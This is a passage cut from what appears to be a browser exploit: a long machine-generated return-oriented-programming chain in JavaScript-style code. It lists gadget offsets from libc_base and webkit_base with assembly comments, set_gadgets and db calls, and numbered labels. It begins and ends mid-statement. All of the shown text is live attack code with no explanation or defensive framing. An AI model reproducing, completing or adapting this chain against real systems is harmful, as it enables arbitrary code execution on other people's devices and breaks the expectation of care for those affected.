rcx libc_base+763368 //pop rcx ]); //L1271: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+114936, //L1274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1273: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1274: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1275: db([26, 0]); // 0x1a set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+115032, //L1276 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+115048, //L1277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1276: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1277: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+115136, //L1279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1279: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+115192, //L1280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1280: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+115264, //L1283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1283: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+115320, //L1284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1284: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1286: libc_base+144605, //pop rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+115456, //L1287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1287: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1289: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+115576, //L1292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+115560, //L1290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1290: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1292: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+115720, //L1295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+115688, //L1293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+115704, //L1294 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1293: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1294: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1295: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+115792, //L1297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1297: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+115848, //L1298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1298: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+115944, //L1301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1300: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1301: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1302: db([27, 0]); // 0x1b set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+116040, //L1303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+116056, //L1304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1303: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1304: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+116144, //L1306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1306: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+116200, //L1307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1307: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+116272, //L1310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1310: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+116328, //L1311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1311: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+116416, //L1313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1313: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1315: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+116536, //L1318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+116520, //L1316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1316: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1318: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+116680, //L1321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+116648, //L1319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+116664, //L1320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1319: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1320: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1321: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+116752, //L1323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1323: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+116808, //L1324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1324: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+116904, //L1327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1326: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1327: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1328: db([1, 0]); // 0x1 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+117000, //L1329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+117016, //L1330 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1329: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1330: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+117104, //L1332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1332: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+117160, //L1333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1333: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+117264, //L1335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1335: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1337: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+117384, //L1340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+117368, //L1338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1338: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1340: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+117528, //L1343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+117496, //L1341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+117512, //L1342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1341: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1342: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1343: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+117600, //L1345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1345: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+117656, //L1346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1346: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+117752, //L1349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1348: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1349: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1350: db([28, 0]); // 0x1c set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+117848, //L1351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+117864, //L1352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1351: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1352: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+117952, //L1354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1354: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+118008, //L1355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1355: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+118080, //L1358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1358: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+118136, //L1359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1359: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1361: webkit_base+12288695, //mov [rdi], r9 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+118272, //L1362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1364: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+118392, //L1367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+118376, //L1365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1365: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1367: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+118536, //L1370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+118504, //L1368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+118520, //L1369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1368: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1369: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1370: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+118608, //L1372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1372: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+118664, //L1373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1373: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+118760, //L1376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1375: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1376: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1377: db([29, 0]); // 0x1d set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+118856, //L1378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+118872, //L1379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1378: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1379: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+118960, //L1381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1381: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+119016, //L1382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1382: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+119088, //L1385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1385: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+119144, //L1386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1386: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1388: libc_base+144605, //pop rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+119280, //L1389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1389: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1391: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+119400, //L1394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+119384, //L1392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1392: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1394: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+119544, //L1397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+119512, //L1395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+119528, //L1396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1395: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1397: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+119616, //L1399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1399: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+119672, //L1400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1400: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+119768, //L1403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1402: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1403: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1404: db([30, 0]); // 0x1e set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+119864, //L1405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+119880, //L1406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1405: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1406: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+119968, //L1408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1408: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+120024, //L1409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1409: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+120096, //L1412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1412: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+120152, //L1413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1413: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+120240, //L1415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1415: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1417: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+120360, //L1420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+120344, //L1418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1418: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1420: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+120504, //L1423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+120472, //L1421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+120488, //L1422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1421: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1422: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1423: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+120576, //L1425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1425: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+120632, //L1426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1426: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+120728, //L1429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1428: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1429: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1430: db([7, 0]); // 0x7 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+120824, //L1431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+120840, //L1432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1431: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1432: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+120928, //L1434 webkit_base+660161, //mov [rsi], 